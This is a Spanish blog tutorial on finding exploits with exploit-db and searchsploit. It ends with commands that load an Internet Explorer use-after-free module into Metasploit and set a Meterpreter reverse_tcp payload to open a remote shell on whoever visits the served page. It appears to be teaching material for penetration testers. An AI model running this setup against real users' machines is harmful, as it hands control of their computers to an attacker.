viernes, 18 de noviembre de 2016

Cómo buscar exploits

Hola Amigos.

En este post vamos a ver cómo podemos conseguir exploits que no están en nuestro metasploit.

En primer lugar, nos vamos a la web de exploitdb https://www.exploit-db.com



Tenemos la opción de buscar los tipos de exploit.



En el apartado shellcode nos encontramos las shells para los distintos S.O.



Podemos ver también distintos papers sobre seguridad, en la opción con el mismo nombre.



Con la opción Google Hacking Database podemos buscar dorks para google.



Vamos a usar el siguiente exploit remoto para android




Como podéis ver, tenemos el código CVE-2016-3861. Los códigos CVE identifican cada una de las vulnerabilidades de manera única, así podemos buscar una vulnerabilidad concreta con su respectivo código CVE.

El código CVE está compuesto de CVE-AÑO_DESCUBRIMIENTO-Nº_IDENTIFICATIVO



En la pestaña buscar, podemos buscar exploits concretos,, vamos a buscar exploits para windows 7.



Si no queremos demostrar que no somos robots con los captchas, nos podemos descargar la aplicación actualizada (aunque ya la tiene kali, pero es mejor descargarla) de



Esta versión se actualiza cada semana, para ello, hay que actualizarla:

./searchsploit -u

Con la opción -w nos muestra los exploits de la página exploitdb con su respectivo enlace

Cada uno de los exploits están en su código fuente, por lo que, tras descargarlos, habría que compilarlos si fuese necesario.

Para evitar que los script kiddies que se creen que los saben todo hagan el tonto con los exploits, los desarrolladores suelen poner errores en el código, así que lo más seguro es que haya que editarlo y corregirlo, y por supuesto, compilarlo.

En algunos casos, si están en ruby, podemos añadirlos a metasploit.

Nos descargamos el siguiente exploit


Una vez descargados

mv 28682.rb /usr/share/metasploit-framework/modules/exploits/windows/browser/ie_setmousecapture_uaf.rb

Daos cuenta que el directorio principal de metasploit es /usr/share/metasploit-framework/.

En metasploit lo cargaríamos como siempre

use exploit/windows/browser/ie_setmousecapture_uaf

set SRVHOST 192.168.1.134

set SSL true

set URIPATH /

set PAYLOAD windows/meterpreter/reverse_tcp

set LHOST 192.168.1.134

exploit

Sígueme en mis redes sociales:
  • facebook: facebook.com/Manugomez1977
  • twitter manugomez1977
  • instagram: manugomez1977

Por favor, haz click en la publi para poder seguir subiendo posts.

Muchas gracias.




No hay comentarios:

Publicar un comentario

Nota: solo los miembros de este blog pueden publicar comentarios.